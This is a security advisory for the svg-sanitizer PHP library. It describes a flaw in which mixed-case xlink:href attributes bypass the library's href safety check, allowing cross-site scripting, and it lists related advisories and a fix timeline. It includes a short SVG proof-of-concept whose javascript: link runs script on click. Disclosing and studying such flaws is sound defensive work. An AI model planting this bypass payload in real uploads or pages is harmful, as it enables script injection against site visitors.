Vulnerability GHSA-22wq-q86m-83fh
Medium Risk
MEDIUM RISK
CVSS Score: 6.0
Score Range: 4.0–6.9
Medium severity vulnerabilities (CVSS 4.0–6.9). Important issues that meaningfully reduce security confidence.
1 year ago
August 12, 2025 at 08:20 PM UTC
svg-sanitizer Bypasses Attribute Sanitization
0.1.0 - 0.5.3 and 0.5.3.1 - 0.21.0
0.1.0 - 0.5.3 and 0.5.3.1 - 0.21.0
Summary
svg-sanitizer Bypasses Attribute Sanitization
Details
Problem
The sanitization logic at https://github.com/darylldoyle/svg-sanitizer/blob/0.21.0/src/Sanitizer.php#L454-L481 only searches for lower-case attribute names (e.g. xlink:href instead of xlink:HrEf), which allows to by-pass the isHrefSafeValue check. As a result this allows cross-site scripting or linking to external domains.
Proof-of-concept
provided by azizk
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100">
<a xlink:hReF="javascript:alert(document.domain)">
<rect width="100" height="50" fill="red"></rect>
<text x="50" y="30" text-anchor="middle" fill="white">Click me</text>
</a>
</svg>
Credits
The mentioned findings and proof-of-concept example were reported to the TYPO3 Security Team by the external security researcher azizk <[email protected]>.
Related Vulnerabilities
Other vulnerabilities affecting the same packages
Medium Risk
4 hours ago
enshrined/svg-sanitize: Stored XSS via DTD Entity / HTML5 Named Character Reference Collision
0.1.0 - 0.5.3 and 0.5.3.1 - 0.22.0 GHSA-9rjx-3jch-6vjf
0.1.0 - 0.5.3 and 0.5.3.1 - 0.22.0 GHSA-9rjx-3jch-6vjf
Medium Risk
4 hours ago
svg-sanitizer: Mixed-case xlink:HrEf skips the `<use>` nesting-DoS check in Resolver::processReferences
0.1.0 - 0.5.3 and 0.5.3.1 - 0.22.0 GHSA-m9xh-6747-9r6f
0.1.0 - 0.5.3 and 0.5.3.1 - 0.22.0 GHSA-m9xh-6747-9r6f
Medium Risk
4 hours ago
enshrined/svg-sanitize: Denial of Service via DTD Attribute Declaration Crash
0.1.0 - 0.5.3 and 0.5.3.1 - 0.22.0 GHSA-v383-3rw5-q8rf
0.1.0 - 0.5.3 and 0.5.3.1 - 0.22.0 GHSA-v383-3rw5-q8rf
Medium Risk
4 years ago
Cross-site Scripting in enshrined/svg-sanitize
0.1.0 - 0.5.3 and 0.5.3.1 - 0.14.1 GHSA-fqx8-v33p-4qcc
0.1.0 - 0.5.3 and 0.5.3.1 - 0.14.1 GHSA-fqx8-v33p-4qcc
Medium Risk
6 years ago
Sanitizer bypass in svg-sanitizer
0.1.0 - 0.5.3 and 0.5.3.1 - 0.13.0 GHSA-8rc5-hx3v-2jg7
0.1.0 - 0.5.3 and 0.5.3.1 - 0.13.0 GHSA-8rc5-hx3v-2jg7
Impacted packages
Timeline
Published
1 year ago
August 12, 2025 at 08:20 PM UTC
Fixed (0.22.0)
1 year ago
August 12, 2025 at 10:13 AM UTC
Last Modified
1 year ago
August 12, 2025 at 08:42 PM UTC